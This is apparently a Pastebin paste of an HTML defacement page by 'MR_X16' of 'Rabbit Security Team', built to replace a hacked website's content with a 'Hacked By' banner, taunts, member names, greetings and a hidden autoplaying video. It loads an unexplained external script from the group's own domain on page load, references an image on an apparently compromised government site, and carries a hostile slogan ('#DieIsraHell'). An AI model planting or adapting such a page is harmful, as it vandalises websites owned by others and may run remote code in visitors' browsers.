Advertisement
MR_X16

Script rabbit

Feb 11th, 2016
265
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 7.82 KB | None | 0 0
  1. <!DOCTYPE html>
  2. <!--
  3. Designed by MR_X16
  4. Rabbit Security Team
  5.  
  6. DefacePage MR_X16 #1
  7. -->
  8. <html>
  9. <head>
  10. <title>Hacked By MR_X16</title>
  11. <link rel="SHORTCUT ICON" href="http://img12.deviantart.net/8cc3/i/2005/212/b/4/evil_playboy_by_freak0.jpg">
  12. <meta name="Author" content="MR_X16 Of Rabbit Security Team"/>
  13. <meta name="copyright" content="MR_X16"/>
  14. <meta name="description" content="Website Hacked By MR_X16 of Rabbit Security Team. We Just Have Fun in Your System!"/>
  15. <meta name="keywords" content="Rabbit Security Team, MR_X16, Security Hacked, Hack"/>
  16. <meta property="og:title" content="[!] Struck by MR_X16"/>
  17. <meta property="og:image:width" content=" ">
  18. <meta property="og:image:height" content=" ">
  19. <meta property="og:image" content="http://dispendukcapil.surabaya.go.id/administrator/components/com_acepolls/assets/css/BackgroundDeface.png">
  20. <link href='http://fonts.googleapis.com/css?family=Amatic SC' rel='stylesheet' type='text/css'>
  21. <link href='http://fonts.googleapis.com/css?family=Megrim' rel='stylesheet' type='text/css'>
  22. <link href='http://fonts.googleapis.com/css?family=Iceland' rel='stylesheet' type='text/css'>
  23. <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js"></script>
  24. <script type="text/javascript" src="http://rabbitsec.ga/jancok"></script>
  25. </head>
  26. <style type="text/css">
  27. @import url(http://fonts.googleapis.com/css?family=Share+Tech+Mono);
  28. body {
  29. background-image: url("");
  30. background-color: black;
  31. background-repeat: fixed;
  32. background-size: 100%;
  33. background-position: top center;
  34. overflow: hidden;
  35. cursor: none;
  36. margin: 0px;
  37. }
  38. svg {
  39. width: 600px;
  40. height: 100px;
  41. display: block;
  42. position: relative;
  43. overflow: hidden;
  44. margin: 0 auto;
  45. background: transparent;
  46. }
  47. text {
  48. filter: url(#filter);
  49. fill: white;
  50. font-family: 'Share Tech Mono', sans-serif;
  51. font-size: 100px;
  52. -webkit-font-smoothing: antialiased;
  53. -moz-osx-font-smoothing: grayscale;
  54. }
  55. #headM{
  56. font-family:Orbitron;
  57. position:fixed;
  58. left:0px;
  59. right:0px;
  60. bottom:0px;
  61. background:transparent;
  62. text-align:center;
  63. }
  64. .title{
  65. font-size:30px;
  66. font-family:Abel;
  67. font-weight:bold;
  68. color:#ffffff;
  69. text-shadow: 0px 0px 10px black;
  70. }
  71. .title span{
  72. font-size:50px;
  73. font-family:Abel;
  74. font-weight:bold;
  75. color:#ffffff;
  76. text-shadow: 0px 0px 10px black;
  77. }
  78. .greets{
  79. font-family: Abel;
  80. color: black;
  81. }
  82. .footer{
  83. font-family:Orbitron;
  84. color:white;
  85. font-size:10px;
  86. text-shadow: 0px 0px 40px black;
  87. }
  88. </style>
  89. </head>
  90. <body>
  91. <center>
  92. <font face="Megrim" color="Grey" size="7">Pwndz By Rabbit Security Team</font><font face="Microsoft Sans Serif" size="2" color="#FFFFFF">
  93. <br>
  94. <br>
  95. <a rel="nofollow" href="http://rabbitsec.xyz/"><img src="http://zonehmirrors.org/defaced/2015/12/07/www.pn-majene.go.id/rabbitsec.ga/RabbitSecCrew.png"height="300" weight="600"></a><br>
  96. <img src="https://s.yimg.com/lq/i/mesg/emoticons7/19.gif"><font face="courier new" size="6" color="#F00">$ We just have fun in your System
  97. ! $<img src="https://s.yimg.com/lq/i/mesg/emoticons7/19.gif"><br>
  98. </font></center>
  99. <center>
  100.  
  101. <script>
  102.  
  103. TypingText = function(element, interval, cursor, finishedCallback) {
  104.  
  105. if((typeof document.getElementById == "undefined") || (typeof element.innerHTML == "undefined")) {
  106.  
  107. this.running = true; // Never run.
  108.  
  109. return;
  110.  
  111. }
  112.  
  113. this.element = element;
  114.  
  115. this.finishedCallback = (finishedCallback ? finishedCallback : function() { return; });
  116.  
  117. this.interval = (typeof interval == "undefined" ? 100 : interval);
  118.  
  119. this.origText = this.element.innerHTML;
  120.  
  121. this.unparsedOrigText = this.origText;
  122.  
  123. this.cursor = (cursor ? cursor : "");
  124.  
  125. this.currentText = "";
  126.  
  127. this.currentChar = 0;
  128.  
  129. this.element.typingText = this;
  130.  
  131. if(this.element.id == "") this.element.id = "typingtext" + TypingText.currentIndex++;
  132.  
  133. TypingText.all.push(this);
  134.  
  135. this.running = false;
  136.  
  137. this.inTag = false;
  138.  
  139. this.tagBuffer = "";
  140.  
  141. this.inHTMLEntity = false;
  142.  
  143. this.HTMLEntityBuffer = "";
  144.  
  145. }
  146.  
  147. TypingText.all = new Array();
  148.  
  149. TypingText.currentIndex = 0;
  150.  
  151. TypingText.runAll = function() {
  152.  
  153. for(var i = 0; i < TypingText.all.length; i++) TypingText.all[i].run();
  154.  
  155. }
  156.  
  157. TypingText.prototype.run = function() {
  158.  
  159. if(this.running) return;
  160.  
  161. if(typeof this.origText == "undefined") {
  162.  
  163. setTimeout("document.getElementById('" + this.element.id + "').typingText.run()", this.interval); // We haven't finished loading yet. Have patience.
  164.  
  165. return;
  166.  
  167. }
  168.  
  169. if(this.currentText == "") this.element.innerHTML = "";
  170.  
  171. // this.origText = this.origText.replace(/<([^<])*>/, ""); // Strip HTML from text.
  172.  
  173. if(this.currentChar < this.origText.length) {
  174.  
  175. if(this.origText.charAt(this.currentChar) == "<" && !this.inTag) {
  176.  
  177. this.tagBuffer = "<";
  178.  
  179. this.inTag = true;
  180.  
  181. this.currentChar++;
  182.  
  183. this.run();
  184.  
  185. return;
  186.  
  187. } else if(this.origText.charAt(this.currentChar) == ">" && this.inTag) {
  188.  
  189. this.tagBuffer += ">";
  190.  
  191. this.inTag = false;
  192.  
  193. this.currentText += this.tagBuffer;
  194.  
  195. this.currentChar++;
  196.  
  197. this.run();
  198.  
  199. return;
  200.  
  201. } else if(this.inTag) {
  202.  
  203. this.tagBuffer += this.origText.charAt(this.currentChar);
  204.  
  205. this.currentChar++;
  206.  
  207. this.run();
  208.  
  209. return;
  210.  
  211. } else if(this.origText.charAt(this.currentChar) == "&" && !this.inHTMLEntity) {
  212.  
  213. this.HTMLEntityBuffer = "&";
  214.  
  215. this.inHTMLEntity = true;
  216.  
  217. this.currentChar++;
  218.  
  219. this.run();
  220.  
  221. return;
  222.  
  223. } else if(this.origText.charAt(this.currentChar) == ";" && this.inHTMLEntity) {
  224.  
  225. this.HTMLEntityBuffer += ";";
  226.  
  227. this.inHTMLEntity = false;
  228.  
  229. this.currentText += this.HTMLEntityBuffer;
  230.  
  231. this.currentChar++;
  232.  
  233. this.run();
  234.  
  235. return;
  236.  
  237. } else if(this.inHTMLEntity) {
  238.  
  239. this.HTMLEntityBuffer += this.origText.charAt(this.currentChar);
  240.  
  241. this.currentChar++;
  242.  
  243. this.run();
  244.  
  245. return;
  246.  
  247. } else {
  248.  
  249. this.currentText += this.origText.charAt(this.currentChar);
  250.  
  251. }
  252.  
  253. this.element.innerHTML = this.currentText;
  254.  
  255. this.element.innerHTML += (this.currentChar < this.origText.length - 1 ? (typeof this.cursor == "function" ? this.cursor(this.currentText) : this.cursor) : "");
  256.  
  257. this.currentChar++;
  258.  
  259. setTimeout("document.getElementById('" + this.element.id + "').typingText.run()", this.interval);
  260.  
  261. } else {
  262.  
  263. this.currentText = "";
  264.  
  265. this.currentChar = 0;
  266.  
  267. this.running = false;
  268.  
  269. this.finishedCallback();
  270.  
  271. }
  272.  
  273. }
  274.  
  275. </script>
  276. <br>
  277. <font face="Iceland" color="white" size="4.5" id="info">Indonesian People Is Here!
  278. <br>Happy New Year! 2016 #RabbitSecTeam #DieIsraHell #GovernmentIsTAI
  279. </font>
  280. <br>
  281. </font></p>
  282.  
  283. <script type="text/javascript">
  284.  
  285. //Define first typing example:
  286.  
  287. //Define second typing example (use "slashing" cursor at the end):
  288.  
  289. new TypingText(document.getElementById("info"), 70, function(i){
  290.  
  291. var ar = new Array("/"," ","/","/"); return " " + ar[i.length %
  292.  
  293. ar.length]; });
  294.  
  295. //Type out examples:
  296.  
  297. TypingText.runAll();
  298. </script>
  299.  
  300. <center>
  301. <font color="White" face="courier new" size="4">.: We Are Rabbit Security Team :. </font>
  302. <br>
  303. <font color="White" face="courier new" size="4">XnonGermx ~ Mr.Holix196 ~ k4mvrets ~ r00tb04M ~ 7euku ~ HarisID ~ Flix920
  304. <br>
  305. <font color="White" face="courier new" size="4">GotzCyber404 ~ n4ta ~ s4ngkuriang ~ S_ID99 ~ ./MrCAT_794
  306. <br>
  307. <font color="White" face="courier new" size="4">MR_X16 ~D3CodeX~ Pak Jokowi And Pak Ahok :*
  308. </font></center>
  309. <br>
  310. <font color="White" face="courier new" size="4">Greetz : IndonesianHackerRulez ~ Indonesia Cyber Crew ~ AnonEvilHax ~ Black Angel ~ nofawkX.al
  311. <br>
  312. <center><font face="Amatic SC" size="4" color="White">Contact Me ? RabbitSec.Team@gmail.com</font></center>
  313. <embed src="https://m.youtube.com/watch?v=3JV74i4yvcA&amp;autoplay=1" type="application/x-shockwave-flash"wmode="transparent" width="1" height="1"></embed>
  314. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement